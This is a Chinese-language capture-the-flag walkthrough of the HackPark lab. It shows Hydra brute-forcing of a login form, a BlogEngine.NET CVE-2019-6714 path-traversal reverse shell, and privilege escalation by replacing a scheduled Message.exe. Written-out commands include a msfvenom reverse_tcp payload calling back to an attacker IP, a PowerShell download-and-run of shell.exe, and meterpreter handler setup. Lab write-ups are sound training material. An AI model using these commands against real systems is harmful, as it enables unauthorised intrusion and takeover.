HackPark
使用 Hydra 暴力登录网站,识别并使用公共漏洞,然后权限提升
使用 Hydra 暴力破解登录
What request type is the Windows website login form using?POST
现在我们知道了请求类型并有了登录表单的 URL,我们可以开始暴力破解
可以使用 burpsuite 来获取 POST 数据包,然后填写 hydra 命令,hydra -l <username> -P /usr/share/wordlists/<wordlist> <ip> http-post-form
来对于 POST 表单进行爆破,注意这里 F=Login Failed
才可以爆破出来正确的密码
1qaz2wsx
破坏机器
在拿到密码后,登录网站在 about 页面中可以找到 BlogEnigne 的版本
Now you have logged into the website, are you able to identify the version of the BlogEngine?3.3.6.0
BlogEngine.NET 3.3.6 - Directory Traversal / Remote Code Execution
在 exploit 中查询找到一个 RCE 漏洞
What is the CVE?CVE-2019-6714
下载了漏洞利用 exp,可以阅读注释了解使用规则
- 在这个方法中设置了
TcpClient
的地址和端口是我们攻击主机和端口 - 这个文件必须要被命名为 PostView.ascx 才可以成功利用
- 上传成功后文件被保存在网站根目录下的
/App_Data/files
目录下 - 访问博客主页,在 URL 中加上一个
theme
参数进行路径穿越
首先,先打开一个端口进行接收 shell
在这里上传好,把 URL 改一下,就可以拿到 shell 了,使用 whoami
命令可以查看到当前的身份
iis apppool\blog
Windows 权限提升
首先,我们要从 netcat 转向 meterpreter 会话,然后来枚举机器来识别潜在的漏洞,然后利用这些收集到的信息来利用系统并成为管理员
先使用 msfvenom 生成一个木马程序来连接机器,msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.13.74.121 LPORT=6969 -f exe -o shell.exe
然后再 msfconsole 中设置好后,准备连接
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST
set LPORT
run
使用 pyhon -m http.server 8989
在 shell.exe 文件目录下开启一个文件服务器,然后在之前 nc 连接的 shell 中使用 powershell -c wget "http://IP 地址:8989/shell.exe" -outfile shell.exe
来下载文件,然后 shell.exe
来运行,就可以获得 meterpreter 会话
之后你可以运行 sysinfo
等 metasploit 命令来获取有关 Windows 系统的详细信息
Windows 2012 R2 (6.3 Build 9600)
在 meterpreter 会话中使用 upload winPEASx64.exe
,把这个文件上传到目标机器中
然后运行 winPEASx64.exe
查看可以利用的提权点
在这里可以发现高危的提权点,是 System Scheduler Service,并且任何人对他都有写入权限,你也可以进入这个目录,查看 events
目录中的日志文件发现他每隔 30s 运行一次
WindowsScheduler
What is the name of the binary you're supposed to exploit?Message.exe
所以我们的思路就是直接替换 Message.exe 文件来实现权限的提升
我们先使用 msfvenom
重新使用一个端口生成利用文件,名字是 Message.exe
注意要从 shell 回到 meterpreter 会话中,先使用 mv
把目录中的 Message 文件重命名,方便后续下载放入我们的文件
这里要注意目录是否在服务的目录(c:\Program Files (x86)\SystemScheduler
),可以使用 pwd
查看当前的目录
然后使用 background
退回到 msfconsole 中,重新使用 set LPORT
指定之前时使用的新的端口,然后过一会就可以拿到管理员权限的 shell 了
之后再到用户桌面和根用户就可以查看到文件的 flag 了
不使用 Metasploit 的权限提升
注意: C:\Windows\Temp
目录是全局可写的,没有权限的时候文件都可以上传到这个目录使用
查看机器的原始安装时间是多久,我这里还是使用的 winPEAS
查看了各个用户的注册时间,管理员的注册时间差不多就是机器的原始安装时间
8/3/2019, 10:43:23 AM